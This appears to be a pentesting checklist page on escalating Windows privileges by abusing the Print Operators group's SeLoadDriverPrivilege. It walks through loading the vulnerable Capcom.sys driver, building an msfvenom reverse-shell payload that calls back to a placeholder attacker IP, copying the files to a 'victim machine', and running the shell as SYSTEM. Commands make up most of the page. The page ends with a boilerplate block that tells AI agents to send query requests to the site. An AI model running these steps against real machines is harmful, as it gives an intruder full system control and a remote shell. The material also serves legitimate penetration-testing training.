# Print Operators

### Overview

The **Print Operators** group is a highly privileged group in Windows that grants its members several significant permissions which includes **`SeLoadDriverPrivilege`**(Allows members to load and manage system drivers).

Members of this group can load system drivers, enabling them to exploit the system.

### **Privilege Escalation Steps**

1. **Download the Capcom.sys Driver**: The **Capcom.sys** driver is a well-known driver that allows users to execute shell code with system privileges. Download it from [here](https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys) or [here](https://github.com/JoshMorrison99/SeLoadDriverPrivilege). Download the other files as well(`LoadDriver.exe` and `ExploitCapcom.exe)` ).
2. **Create a Malicious Executable:**

   ```bash
   msfvenom -p windows/x64/shell_reverse_tcp LHOST={ATTACKER_IP} LPORT=4444 -f exe -o rev.exe
   ```
3. **Transfer files**: Transfer `Capcom.sys`, `LoadDriver.exe`, `rev.exe` and `ExploitCapcom.exe` to victim machine.
4. **Invoke Exe**: Invoke `LoadDriver.exe`. This should return `NTSTATUS: 00000000, WinError: 0`. If it doesn't try changing the location of `Capcom.sys` or where you are executing `LoadDriver.exe` .

   ```powershell
   .\LoadDriver.exe System\CurrentControlSet\MyService C:\Users\Test\Capcom.sys
   ```
5. **Run Shell**: After successfully loading the driver, use `ExploitCapcom.exe` to execute your malicious executable with elevated privileges:

   ```powershell
   .\ExploitCapcom.exe C:\Windows\Place\to\reverseshell\rev.exe
   ```

### References

1. <https://notes.dollarboysushil.com/windows-privilege-escalation/group-privileges/print-operators#using-capcom.sys-for-privilege-escalation>
2. <https://github.com/JoshMorrison99/SeLoadDriverPrivilege>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gokulkarthik.gitbook.io/pentesting-checklist/windows-and-active-directory/windows-privilege-escalation/group-privileges/print-operators.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.